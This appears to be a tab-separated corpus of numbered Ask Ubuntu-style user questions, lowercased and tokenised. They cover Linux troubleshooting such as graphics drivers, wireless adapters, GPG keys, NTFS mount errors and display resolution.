395090	problem with xtreme download manager notification icon	xdm had been working fine for , but i think the problem arose once i updated it . instead of the notification icon being in the tray , it now floats on the screen . this is really annoying because it blocks other items on the screen . it looks like this , how can i fix this glitch ? i 've already tried completely removing and re-installing , but it does nothing .
395092	geforce gt 240m crushes ubuntu 13.10	i have a lenovo monoblock system with nvidia geforce gt 240m on board . initially ubuntu installs nouveau drivers , that have low screen resolution , so i wish i had proprietary drivers for better performance . all options in additional drivers ( versions 304 , 310 ) make the system fail , so when i reboot i see only white , grey , blue and rgb screens changing - and the system freezes . is there any way to make this sh** work properly ?
395093	ibm thinkpad x40 wont work after update	i got a laptop recently from my school that was donated by one of the companies . i installed ubuntu on it and it was working fine but then i got home and it prompted me to do an update . i am a complete noob at this so i clicked yes and the out come is that now the computer starts . checks ram . then shows the ubuntu sign with 5 red dots under it and then goes completely blank . can anyone help ?
395094	install root ca certificate in ubuntu	can anyone help me in installing the root ca in ubuntu 12.x . i have gor the root ca in .cer format which i would need to install . kindly help me at the earliest .
395095	how to generate a gnupg key with seahorse	i want to start using gnupg keys . for this purpose i 've installed gnupg and use the graphical interface seahorse . by selecting a new pgp-key in seahorse i generate a new key . what i 'm curiose about is the following : the generate key , is this just the private one ? and here the details about that key is it correct , that i just created a private key ? if so , how do i create now a suitable public one ?
395097	half/quarter of the native resolution on a macbook with retina display	i have a macbook pro notebook with native resolution of 2560x1600 which makes all my desktop details unreadable . i tried increasing dpi , but icons remain small , so i decided to decrease display resolution . i thought that resolution of 1280x800 would work the best , as 4 pixels of the native resolution would become one pixel in the lower resolution . but 1280x800 is not available to set : $ xrandr -q screen 0 : minimum 320 x 200 , current 2560 x 2538 , maximum 32767 x 32767 edp1 connected 1440x900+0+1638 ( normal left inverted right x axis y axis ) 286mm x 179mm 2560x1600 60.0 + 2048x1536 60.0 1920x1440 60.0 1856x1392 60.0 1792x1344 60.0 1920x1200 60.0 1920x1080 59.9 1600x1200 60.0 1680x1050 60.0 59.9 1600x1024 60.2 1400x1050 60.0 1280x1024 60.0 1440x900 59.9* 1280x960 60.0 1360x768 59.8 60.0 1152x864 60.0 1024x768 60.0 800x600 60.3 56.2 640x480 59.9 dp1 connected primary 2560x1440+0+0 ( normal left inverted right x axis y axis ) 597mm x 336mm 2560x1440 60.0*+ 1280x720 59.9 so i set resolution of 1440x900 and the desktop is blurry . i tried setting the native resolution with xrandr -- output edp1 -- scale .5x.5 but the effect s not any better . how to set 1280x800 resolution which is 1/4 size of the native resolution of 2560x1600 to make my screen look better ? update : it 's strange : when i boot to macos and try changing retina display resolution to scaled it also offers 1440x900 , but the resulting picture is very good .
395100	why can i not add new bookmarks to a firefox bookmarks folder ?	i not able to add new bookmarks to a firefox bookmarks folder . this bookmarks folder contains a lot of entries . is that the cause ? if so , what should i do ? ps i run firefox 26 under ubuntu precise .
395101	how to test ethernet adapter ?	is there a way in ubuntu to test your ethernet adapter to see whether it 's working correctly or not ?
395102	64bit ubuntu 12.04 python can not run an existing python file	absolute path , fails : nan @ uxn : ~ $ python /home/nan/google_appengine/goagent/local/proxy.py python : ca n't open file '/home/nan/google_appengine/goagent/local/proxy.py ' : [ errno 2 ] no such file or directory relative path , also fails : nan @ uxn : ~ $ cd /home/nan/google_appengine/goagent/local nan @ uxn : ~/google_appengine/goagent/local $ python proxy.py python : ca n't open file 'proxy.py ' : [ errno 2 ] no such file or directory i have read some solutions , they say its a shared problem . and i ranďź sudo apt-get install libc6-i386 lib32gcc1 lib32z1 lib32stdc++6 ia32-libs but still fails . what should i do ? thanks . nan @ uxn : ~ $ ls -alhs /home/nan/google_appengine/goagent/local/ total 6.3m 4.0k drwx -- -- -- 3 nan nan 4.0k dec 15 10:59 . 4.0k drwx -- -- -- 4 nan nan 4.0k dec 15 10:59 .. 4.0k -rw -- -- -- - 1 nan nan 2.7k dec 12 23:58 addto-startup.js 4.0k -rw -- -- -- - 1 nan nan 3.3k dec 12 23:58 addto-startup.py 248k -rw -- -- -- - 1 nan nan 245k dec 12 23:58 cacert.pem 4.0k -rw -- -- -- - 1 nan nan 2.9k dec 12 23:58 ca.crt 4.0k drwx -- -- -- 2 nan nan 4.0k dec 16 19:37 certs 24k -rw -- -- -- - 1 nan nan 24k dec 12 23:58 goagent.exe 16k -rw -- -- -- - 1 nan nan 13k dec 12 23:58 goagent-gtk.py 8.0k -rw -- -- -- - 1 nan nan 6.9k dec 12 23:58 goagent-osx.command 4.0k -rw -- -- -- - 1 nan nan 411 dec 12 23:58 microsoft.vc90.crt.manifest 644k -rw -- -- -- - 1 nan nan 641k dec 12 23:58 msvcr90.dll 4.0k -rw -- -- -- - 1 nan nan 62 dec 12 23:58 proxy.bat 8.0k -rw -- -- -- - 1 nan nan 4.4k dec 15 11:07 proxy.ini 416k -rw -- -- -- - 1 nan nan 413k dec 23 11:17 proxy.pac 132k -rwx -- x -- x 1 nan nan 132k dec 12 23:58 proxy.py 4.0k -rw -- -- -- - 1 nan nan 1.6k dec 12 23:58 proxy.sh 2.4m -rw -- -- -- - 1 nan nan 2.4m dec 12 23:58 python27.dll 44k -rw -- -- -- - 1 nan nan 43k dec 12 23:58 python27.exe 2.2m -rw -- -- -- - 1 nan nan 2.2m dec 12 23:58 python27.zip 8.0k -rw -- -- -- - 1 nan nan 5.8k dec 12 23:58 switchyoptions.bak 184k -rw -- -- -- - 1 nan nan 182k dec 12 23:58 switchysharp.crx 4.0k -rw -- -- -- - 1 nan nan 134 dec 12 23:58 uvent.bat
395105	can not change eth1 to ad-hoc mode using iwconfig	i want to change my wireless interface eth1 to ad-hoc mode , but when i use iwconfig eth1 mode ad-hoc it is still unchanged ( remain mode : managed ) . i am running out of time . how can i do it ? here is the result from terminal : result of root @ node1-laptop : /home/node1 # ifconfig : eth0 link encap : ethernet hwaddr 00:26:22:06 : c4 : df up broadcast multicast mtu:1500 metric:1 rx packets:0 errors:0 dropped:0 overruns:0 frame:0 tx packets:0 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:0 ( 0.0 b ) tx bytes:0 ( 0.0 b ) interrupt:17 eth1 link encap : ethernet hwaddr 00:25:56 : b8 : f3:52 inet addr:10.0.0.15 bcast:10.0.0.255 mask:255.255.255.0 inet6 addr : fe80 : :225:56ff : feb8 : f352/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:38 errors:0 dropped:0 overruns:0 frame:136 tx packets:57 errors:6 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:5488 ( 5.4 kb ) tx bytes:9766 ( 9.7 kb ) interrupt:18 lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:16436 metric:1 rx packets:8 errors:0 dropped:0 overruns:0 frame:0 tx packets:8 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:480 ( 480.0 b ) tx bytes:480 ( 480.0 b ) then : root @ node1-laptop : /home/node1 # ifconfig eth1 down result of root @ node1-laptop : /home/node1 # iwconfig : lo no wireless extensions . eth0 no wireless extensions . eth1 ieee 802.11bg essid : '' '' **mode : managed** frequency:2.462 ghz access point : not-associated bit rate:54 mb/s tx-power:24 dbm retry min limit:7 rts thr : off fragment thr : off encryption key : off power managementmode : all packets received link quality=5/5 signal level=0 dbm noise level=-91 dbm rx invalid nwid:0 rx invalid crypt:0 rx invalid frag:0 tx excessive retries:0 invalid misc:0 missed beacon:0 pan0 no wireless extensions . then : root @ node1-laptop : /home/node1 # iwconfig eth1 mode ad-hoc result of root @ node1-laptop : /home/node1 # iwconfig : lo no wireless extensions . eth0 no wireless extensions . eth1 ieee 802.11bg essid : '' '' **mode : managed** frequency:2.462 ghz access point : not-associated bit rate:54 mb/s tx-power:24 dbm retry min limit:7 rts thr : off fragment thr : off encryption key : off power managementmode : all packets received link quality=5/5 signal level=0 dbm noise level=-91 dbm rx invalid nwid:0 rx invalid crypt:0 rx invalid frag:0 tx excessive retries:0 invalid misc:0 missed beacon:0 pan0 no wireless extensions .
395106	how to set the path of “application finder” in xfce ?	in xfce , alt-f2 opens a dialog `` application fincer '' ( xfce4-appfinder -c ) . how to customize the $ path of xfce 's session that is used for autocompleting and running the command ? ( it 's not the $ path of .profile or .bashrc )
395108	ubuntu startup and shutdown	i have an ubuntu machine with ibm websphere and soapui i use soapui to run a mockservice and websphere to load some web applications and services . i want my machine to shutdown at 23:59 and to power up at 08:00 every day from monday to friday . whenever the machine power ups , i want to log into an specific user account , i 've already managed myself to achieve this . the problem is that from that user i must run websphere ( as sudo ) and the soapui mockservice . i know how to run the mockservice from commands , but have no idea how to run websphere . i 've tried to set up an script into the init application manager , but does n't seems to work . this is the script : # ! /bin/sh sudo /opt/ibm/websphere/appserver/bin/startserver.sh server1 /opt/soapui/bin/mockservicerunner.sh -m '' myservice '' /opt/soaui/projects/myproyect.xml sudo shutdown -p 23:59
395110	how to ssh connection between two ubuntu machines which one of them does n't have internet ?	i have a ubuntu 12.04 virtual machine which able to cennect internet and a beagleboard-xm that includes ubuntu 13.10 os without any internet connection . i want to connect with ssh into the beagleboard-xm . i tried many options and did n't get any results . please help me . thanks , regards mustafa edit : thank you hatef for your answer , and i used ethernet ( cat ) cable . i found a page http : //anwaarullah.wordpress.com/2013/07/16/direct-access-raspberry-pi-shell-and-desktop/ which wan na do the same operation with me but with just one different part , they use rasberry-pi instead of beagleboard-xm . i applied what there is written and i can now able to connect with ssh into the beagleboard . but i give the ip to beagleboard with sudo ifconfig eth0 x.x.x.x command using serial terminal and i finally connected .
395113	how to fill a webpage form automatically from a spreadsheet ?	i am working on a form filling process . every time , i go to spreadsheet and copy the data , to paste on web site continuously so i feel bore and wasting time . i want to automate the process with a simple technique but i know a little bit about imacro tool website here . i want best solution and simple technique ... .
395116	what is ubuntu 's equivalent of windows shell : startup ?	i 'd like to automatically startup a few apps upon user login , where and how do i access this startup folder ?
395118	how to install perf on a custom build kernel ?	i want to use profiling tools in linux . i see some information say oprofile is not support in ubuntu 12.04 and the alternate is perf . so i try to install perf . i installed linux-tools-common , linux-base and linux-tools . then i type perf in the terminal and it returns : perf not found for kernel 3.12.6 you may need to install linux-tools-3.12.6-3.12.6 but i could not install either linux-tools-3.12.6-3.12.6 ( i think it 's a wrong name ) or linux-tools-3.12.6 . is it a wrong way to install and use perf in that way , or is it the kernel problem ( the kernel is compiled by myself ) ?
395124	how come a python file is executable even though its permissions are 644 ?	i think i am misunderstanding something here . i have made an easy python testing file to see how permissions affect the use of python files . i did so in order to be able to answer 64bit ubuntu 12.04 python can not run an existing python file setup i have made a test.py file with the contents print 'i am working' test case 1 ls -al test.py -rw-r -- r -- 1 joey joey 25 dec 24 11:11 test.py python test.py i am working how come python is executing this file even though i did not do chmod +x test.py ? test case 2 chmod 400 test.py ls -al test.py -r -- -- -- -- 1 joey joey 25 dec 24 11:11 test.py python test.py i am working so apparently python only needs read permission in order to execute my file ? test case 3 chmod 200 test.py ls -al test.py -- w -- -- -- - 1 joey joey 25 dec 24 11:11 test.py python test.py python : ca n't open file 'testo.py ' : [ errno 13 ] permission denied write permissions are insufficient ( and for the record , only executable permissions are insufficient as well ) . how come python executes files without executable permissions ?
395126	tor on ubuntu 13.10	i was using the 64 bit version of ubuntu on my old computer which had enough ram for it and tor worked fine . i 'm using the 32 bit version of ubuntu and when i downloaded the tor network i can not enter anything with my keyboard at all so no entering websites or anything ... it works when i right click and copy and paste but can not use the keyboard how do i make it work ?
395129	wifi on 12.04 samsung rv511	i ca n't get wifi on my samsung rv511 laptop running ubuntu 12.04 . i went to additional drivers with an ethernet connection but it says that it wo n't download and to check /var/log/jockey.log for more details . typing this into the terminal or file system shows nothing . i 'm new to linux and if this works it will definitely be better than dual-boot windows/linux or just windows edit : i bought a wifi adapter ( originally for my raspberry pi but it 's sitting with a powerline adapter now ) which works great although if anyone knows how to get the drivers please post .
395131	unable to install wireless 802.11n usd usb le0-nano 150 n adpter driver in ubuntu 13.10	i have problem in installing wireless adapter in my ubuntu system i install drive properly but it didnât show my device please give me a solution to solve this issue
395132	wifi hostspot setup for cable modem connection	i have a broadband connection through my isp ( hathway ) , using a cable modem . i wish to share the internet connection to my laptop , and the phone . refer to this configuration guide at 12.10 wireless hotspot configuration and internet browsing - question as of now , my laptop and phone are able to detect the wifi hotspot and able to connect . but i am unable to browse / connect to the internet . when i set up this connection , i see that it requires the dns for the isp , which i do not know . how do i set up domain-name-servers if i have a dhcp based ip address from the service provider . secondly , can the ip address of the hotspot be the dns ?
395134	setting a hotkey for connecting and disconnecting a network connection in kde environment	is there a way to set a hotkey for toggling connection through a network cable : also if i have a command in command-line that can do this or a piece of c++ code that does this i can set a hotkey for it .
395137	how to verify & fix apu graphics usage ( mhz stepping , load , flash video dropping frames & burning cpu ) ?	i 'm afraid that my system is not using graphics card the way it should ( thanks to god [ or , devs ] it 's used at all ) . how to fix issues listed below ? 1 ) gpu core clock always at the bottom ( stepping : should n't mhz go higher when 100 % load ? ) and 2 ) gpu load is jumping from 0 to 100 % , highly rare between ( should n't it be 50 % instead of 100 % and 0 % ? and why it reaches 100 % while the only 'working ' app is the terminal ? ) , both 1 ) and 2 ) not depending on doing nothing ( terminal actually ) or playing totem/flash chrome video . only difference is cpu ( notice c ) load 50 % for totem and ~100 % for 144p flash ( so youtube-dl does great job instead ] : - > ) . user @ machine : ~ $ aticonfig -- adapter=0 -- od-getclocks adapter 0 - amd radeon hd 7340 graphics core ( mhz ) memory ( mhz ) current clocks : 283 667 current peak : 523 667 configurable peak range : [ 283-523 ] [ 667-667 ] gpu load : 100 % user @ machine : ~ $ aticonfig -- adapter=0 -- od-getclocks adapter 0 - amd radeon hd 7340 graphics core ( mhz ) memory ( mhz ) current clocks : 283 667 current peak : 523 667 configurable peak range : [ 283-523 ] [ 667-667 ] gpu load : 0 % i 'd just add that aticonfig overclocking appeared not supported by this card and i 've changed totem ( gstreamer ) video plugin for x windows system which presumably lowered cpu usage for higher gpu load . 3 ) flash player dropping frames as shown below img 8kb ( i 'd prefer 100 % gpu load for 100 % of time instead dropped frames ) and 4 ) i 've managed to get accelerated rendering in flash , yet could n't make it to accelerate decoding so far . chrome : //gpu/ shows everything green & accelerated and no problems detected ... so i take it as cruel to does n't accelerate video decoding . i 've modified flags for compositing : hardware accelerated on all pages and threaded , no difference from default noticeable . tried to update flash and peeper but it makes not difference since i had up-to-date versions . tried disabling pepper , but that disables accelerated rendering as well and makes flash video black-blinking , it does nothing good at all . and yes , i 've enabled html5 videos but it does n't always work and even does n't make much of a difference ( dropped frames are not listed [ 0 ] but still noticeable [ lol ] ) . short notebook spec : amd e2-1800 apu ( accelerated processor ) : strange enough it is 1700 mhz and 850 mhz from system profiler while as far as i know it should be 2x 1700 or 2x 850 . 4gb ram & 4gb swap file amd radeon hd 7340 : 283 mhz x 667 mhz for 384 mb run by catalyst 13.12 x64 not beta ( drivers & control center by amd for amd on linux ) under ubuntu 12.04 precise x64 . respect for going through all this text . any idea ? edit before catalyst 13.12 i was using 'recommended ' additional drivers ( tried bunch of them ) , but after a while i stayed with catalyst . for mozilla firefox i do n't have even flash accelerated video rendering ( while enabled ofc ) .
395140	long range wifi trouble	i just installed ubuntu 13.10 on my windows 8 ( dual boot ) . in ubuntu i can connect to wifi only within 2m radius around the router.it works fine in windows . can anyone help me with a solution so that i can connect to wifi normally !
395145	bumblebee applications running very slow	my laptop has nvidia gt 520mx discrete graphics . i installed bumblebee to take advantage of optimus technology . but applications are running slow with bumblebee . applications with small memory footprint like mines game and gedit are running fine ( ran them with bumblebee just for testing ) . but video playback with totem is very laggy . frame rate is too low . firefox is also comparatively slow . what should i do ?
395147	unable to change computer name	i have installed ubuntu 12 on macosx 10.7 and i have n't bound it to domain . so i am logging in locally but when i use the command mentioned above , i am unable to save the file after typing my name in host file . please share the commands to save the file also i tried saving the host file in gedit but there are no options to save it . can you please assist ? i have entered : sudo nano /etc/hostname arijit 127.0.0.1 localhost 127.0.1.1 ubuntu.local arijit # change to your new hostname/fqdn
395148	problem with dual booting from two separate storage media	hello and happy holidays , i 've got a problem i can ' t seem to fix at the moment . i 've got two storage media on my laptop . one ssd with ubuntu 13.10 and one hdd with windows 7 ( connected on the optical drives sata with the use of an hddcaddy ) . now i want to be able to select the drive i want to boot from the bios . so if i want to browse/program/work i boot the ssd with ubuntu and when i need to run windows apps i boot the hdd . now when i try to change the boot order , i see that only one storage media pops up , the windows hdd . so it can only boot in `` windows mode '' . when i remove the hdd ( remove the optical bay 's hdd caddy ) i can see my ssd again and i can boot ubuntu again . both storage media 's are named hdd0 : different serial numbers here i 'm using an acer laptop with insydeh2o as bios . so my question is what i 'm doing wrong and how can i fix this problem and let both storage media 's talk to each other in perfect harmony . thank you in advance , pascal
395150	how can i extract all pdf links on a website ?	this is a little off topic , but i hope you guys will help me . i 've found a website full of articles i need , but those are mixed with a lot of useless files ( mainly jpgs ) . i would like to know if there is a way to find ( not download ) all pdfs on the server to make a list of links . basically i would simply like to filter out everything that 's not a pdf , in order to get a better view on what to download and what not .
395152	how can i pipe out output to file from terminal without linefeeds ?	i have below command which output the result as newlines in every key press . i do n't want it to output to file as new lines instead i want it to send it to file without linefeeds . stdbuf -o0 xinput test 11 > out is it possible ?
395157	[ 13.10 ] [ intel gma ] dvi not showing	im new to xrandr tool and configuring x on linux - i allways used the terminal . im trying to setup my linux server into xbmc machine . the vga worked from the start but im having problem with dvi ( so i can use it latter as dvi- > hdmi ) . im pluging my monitor into dvi , but theres nothing . display setup only detect one monitor ( the vga ) . xrandr only see vga . the mobo is intel dq35joe . the sad part is the dvi work flawless on windows . screen 0 : minimum 320 x 200 , current 1280 x 1024 , maximum 32767 x 32767 vga1 connected primary 1280x1024+0+0 ( normal left inverted right x axis y axis ) 376mm x 301mm 1280x1024 60.0*+ 75.0 1280x960 75.0 1152x864 75.0 1024x768 75.1 70.1 60.0 832x624 74.6 800x600 72.2 75.0 60.3 56.2 640x480 75.0 72.8 66.7 60.0 720x400 70.1 virtual1 disconnected ( normal left inverted right x axis y axis ) xrandr only see vga . the mobo is intel dq35joe . the sad part is the dvi work flawless on windows . lspci 00:00.0 host bridge : intel corporation 82q35 express dram controller ( rev 02 ) 00:02.0 vga compatible controller : intel corporation 82q35 express integrated graphics controller ( rev 02 ) 00:03.0 communication controller : intel corporation 82q35 express mei controller ( rev 02 ) 00:03.2 ide interface : intel corporation 82q35 express pt ider controller ( rev 02 ) 00:03.3 serial controller : intel corporation 82q35 express serial kt controller ( rev 02 ) 00:19.0 ethernet controller : intel corporation 82566dm-2 gigabit network connection ( rev 02 ) 00:1a.0 usb controller : intel corporation 82801i ( ich9 family ) usb uhci controller # 4 ( rev 02 ) 00:1a.1 usb controller : intel corporation 82801i ( ich9 family ) usb uhci controller # 5 ( rev 02 ) 00:1a.2 usb controller : intel corporation 82801i ( ich9 family ) usb uhci controller # 6 ( rev 02 ) 00:1a.7 usb controller : intel corporation 82801i ( ich9 family ) usb2 ehci controller # 2 ( rev 02 ) 00:1b.0 audio device : intel corporation 82801i ( ich9 family ) hd audio controller ( rev 02 ) 00:1c.0 pci bridge : intel corporation 82801i ( ich9 family ) pci express port 1 ( rev 02 ) 00:1c.1 pci bridge : intel corporation 82801i ( ich9 family ) pci express port 2 ( rev 02 ) 00:1c.2 pci bridge : intel corporation 82801i ( ich9 family ) pci express port 3 ( rev 02 ) 00:1c.3 pci bridge : intel corporation 82801i ( ich9 family ) pci express port 4 ( rev 02 ) 00:1c.4 pci bridge : intel corporation 82801i ( ich9 family ) pci express port 5 ( rev 02 ) 00:1d.0 usb controller : intel corporation 82801i ( ich9 family ) usb uhci controller # 1 ( rev 02 ) 00:1d.1 usb controller : intel corporation 82801i ( ich9 family ) usb uhci controller # 2 ( rev 02 ) 00:1d.2 usb controller : intel corporation 82801i ( ich9 family ) usb uhci controller # 3 ( rev 02 ) 00:1d.7 usb controller : intel corporation 82801i ( ich9 family ) usb2 ehci controller # 1 ( rev 02 ) 00:1e.0 pci bridge : intel corporation 82801 pci bridge ( rev 92 ) 00:1f.0 isa bridge : intel corporation 82801io ( ich9do ) lpc interface controller ( rev 02 ) 00:1f.2 sata controller : intel corporation 82801ir/io/ih ( ich9r/do/dh ) 6 port sata controller [ ahci mode ] ( rev 02 ) 00:1f.3 smbus : intel corporation 82801i ( ich9 family ) smbus controller ( rev 02 ) 03:00.0 ide interface : marvell technology group ltd. 88se6101/6102 single-port pata133 interface ( rev b2 ) there 's nothing in bios what would prevent it from working . i tried to install intel drivers from 01.page but there are only for 13.04 and use some deprecated packages .
395159	mount error `` exit code 12 '' on 1 tb usb hard drive	i 'm a linux noob , just now migrating from windows . this is my first question to the community , and i hope i get the forms right . i 've looked around at the other similar questions here , but none seem to apply exactly to my situation , or else i just ca n't adapt their solutions to my specific case . i have an external western digital 1 tb usb 2.0 hard drive that i 'm trying to connect to my ubuntu 12.04 precise pangolin computer . when i plug it in , i get an error looking like this : unable to mount elements 1t error mounting : mount exited with exit code 12 : failed to read last sector ( 1953523119 ) : invalid argument hints : either the volume is a raid/ldm but it was n't setup yet , or it was not setup correctly ( e.g . by not using mdadm -build ... ) , or a wrong device is tried to be mounted , or the partition table is corrupt ( ntfs size is not valid ) . failed to mount '/dev/sdb1 ' : invalid argument the device '/dev/sdb1 ' does n't seem to have a valid ntfs . maybe the wrong device is used ? or the whole disk instead of a partition ( e.g . /dev/sda , not /dev/sda1 ) ? or the other way around ? when i check the partition with disk utility , it sees the partition , but can not mount it : error mounting volume an error occurred while performing an operation on `` elements 1t '' ( partition 1 of wd wdcwd1oeads-11m2b2 ) : the operation failed details error mounting : mount exited with exit code 12 : failed to read last sector ( 1953523119 ) : invalid argument it also shows this info : usage : file system partition type : hpfs/ntfs ( 0x07 ) partition flags : bootable type : ntfs label : elements 1t device : /dev/sdb1 partition label : - capacity : 1.0 tb ( ... bytes ) available : - mount point : not mounted check file system returns : file system is not clean gparted , on the other hand , ca n't see the partition at all , it thinks the entire disk space is unallocated . from some of the error codes and stuff i 've gotten on terminal commands like fdisk etc . i hypothesize that the problem might be that linux does n't allow spaces in device names , can that be the problem ? however , none of my disk utilities can change the names . i know you guys usually want to see outputs from certain commands such as fdisk and cat , but if so you 'll have to walk me through it , i do n't know what i 'm doing : - ) grateful for all help m. northstar edit 1 the output of sudo ntfsck /dev/sdb1 that douggo suggested is this : failed to read last sector ( 1953523119 ) : invalid argument hints : either the volume is a raid/ldm but it was n't setup yet , or it was not setup correctly ( e.g . by not using mdadm -- build ... ) , or a wrong device is tried to be mounted , or the partition table is corrupt ( partition is smaller than ntfs ) , or the ntfs boot sector is corrupt ( ntfs size is not valid ) . failed to read file record at offset -5553569967260305760 ( 0xb2edc189f22bf6a0 ) . loading $ mft runlist failed . trying $ mftmirr . failed to read file record at offset -5561604126825345472 ( 0xb2d13683673a8e40 ) . loading $ mftmirr runlist failed too . aborting . failed to read last sector ( 1953523119 ) : invalid argument hints : either the volume is a raid/ldm but it was n't setup yet , or it was not setup correctly ( e.g . by not using mdadm -- build ... ) , or a wrong device is tried to be mounted , or the partition table is corrupt ( partition is smaller than ntfs ) , or the ntfs boot sector is corrupt ( ntfs size is not valid ) . as you can see , two blocks with the same error i got before , with some new info sandwiched in between . edit 2 as suggested by douggro , the output of chkdsk ( translated by me from swedish ) is : chkdsk is verifying files 33536 files processed file verification completed 3 large file records processed 0 bad file records processed 0 ea records processed 0 reparse records processed chkdsk is verifying indexes 38674 index entries processed index verification completed 0 unindexed files scanned 0 unindexed files recovered chkdsk is verifying security descriptors 33536 file sds/sids processed security descriptor verification completed 2570 data files processed chkdsk is verifying the usn journal 37004568 usn bytes processed verification of usn journal completed windows has checked the file system and found no problems 976761559 kb total disk space 620445736 kb in 27005 files 14512 kb in 2571 indexes 2820 kb in bad sectors 165667 kb in use by the system 65536 kb occupied by the log file 356132824 kb available on disk 4096 byte in each allocation unit 244190389 total allocation units on disk 8903206 allocation units available on disk
395161	overwriting files when extracting from a tar archive	i play openttd . there are three versions available and i want to have all three ; stable , testing and nightly . i downloaded and compiled the source code for all three with no problems . the issue is when i want to compile a new version . when i extract the tar.xz file into /usr/lib/games/openttd-trunk/ the old files are n't overwritten . instead , a new directory is created called openttd-trunk-r26175 . is there any way to extract the files from the archive directly into /usr/lib/games/openttd-trunk/ ? that way i can just simply make without having to ./configure every time . edit : i do n't think i made clear that the archive has the source files inside a single folder called openttd-trunk-r26175 . what i want to do is extract all files from that folder , but not the folder itself .
395165	is a block size of 4 mib on a partition of 99.06 gib too big ?	its a new laptop i 'm using , and currently installing ubuntu 13.10 i am having to move 3 ntfs partitions to right , grow two of them to 99 gib , and shrink one of them to 55.46 gib . so to do this gparted is using a block size of 4.00 mib on one of the partitions . this particular partition will be used to store music and movies , so a combination of both small and large sized files . is the block size of 4.00 mib too large on this partition ?
395168	ubuntu installation sbn	i am having a ubuntu 13.10 usb is it possible to install ubuntu by replacing windows without loosing my windows disk partitions and its files ? i mean , i want to replace windows but wan na keep the partitions c : d : e : and the files inside it . can anyone help me ?
395170	juju deploy services to two machines	hello i want to know if i 'm doing it right- i install juju-gui on the 0 machine after that i want to install openstack-dashboard and a few other services to machine 2 and when i do it they go - pending mode . i can login with juju ssh 2 to the other computer but the services are pending . what should i do ? thanks
395172	how to verify if a exported gpg key is a public or a private one	if i 've exported a gpg key using the command line , how can i verify if the exported key is a public one ? i 'm interested in both , a binary format and the armored format as well . i 'm just a little bit scared to accidentally publish my private key . thanks for your help
395175	ubuntu 13.10 does not load up correctly	after tring to install the wizard feature of compiz , the ubuntu doesnt load up correctly . the only thing i can see is my background ( the terminal doesnt work too ) . how can i fix this problem ?
395177	problem in ubuntu 12.04 with tl-wn823n	got a problem with ubuntu 12.04 lts and tplink tl-wn823n . installed the driver from www.realtek.com.tw before that i would like to inform that currently there is no internet connection on my ubuntu 12.04 . so i need to download manually the `` install file '' from my laptop and install it manually . i already done the following step : first i 'm editing the file for blacklist.conf sudo gedit /etc/modprobe.d/blacklist.conf add lines for : blacklist rtl8192cu blacklist rtl8192c_common blacklist rtlwifi then save and exit . install the drivers for realtek 8192cu from realtek.com.tw why not using the rtl8192cu-tjp-dkms_1.6_all.deb ? it works on 13.04 not 12.04 as far that i know . it gives me error : dependency is not satisfiable : dkms ( > =1.95 ) and do the code below sudo sh install.sh got the result like this : # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # realtek wi-fi driver auto installation script novembor , 21 2011 v1.1.0 # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # decompress the driver source tar ball : rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911.tar.gz rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/ rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/runwpa rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/core/ rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/core/rtw_xmit.c rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/core/rtw_ioctl_query.c rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/core/efuse/ rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/core/efuse/rtw_efuse.c rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/core/rtw_recv.c rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/core/rtw_br_ext.c rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/core/rtw_eeprom.c rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/core/rtw_debug.c rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/core/rtw_tdls.c rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/core/rtw_p2p.c rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/core/rtw_ieee80211.c rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/core/rtw_security.c rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/core/rtw_cmd.c rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/core/rtw_mlme.c rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/core/rtw_mp.c rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/core/rtw_sreset.c rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/core/rtw_sta_mgt.c rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/core/rtw_rf.c rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/core/rtw_pwrctrl.c rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/core/rtw_wlan_util.c rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/core/rtw_mlme_ext.c rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/core/rtw_io.c rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/core/rtw_ap.c rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/core/rtw_ioctl_rtl.c rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/core/rtw_mp_ioctl.c rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/core/rtw_ioctl_set.c rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/core/rtw_iol.c rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/wlan0dhcp rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/os_dep/ rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/os_dep/osdep_service.c rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/os_dep/linux/ rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/os_dep/linux/ioctl_linux.c rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/os_dep/linux/recv_linux.c 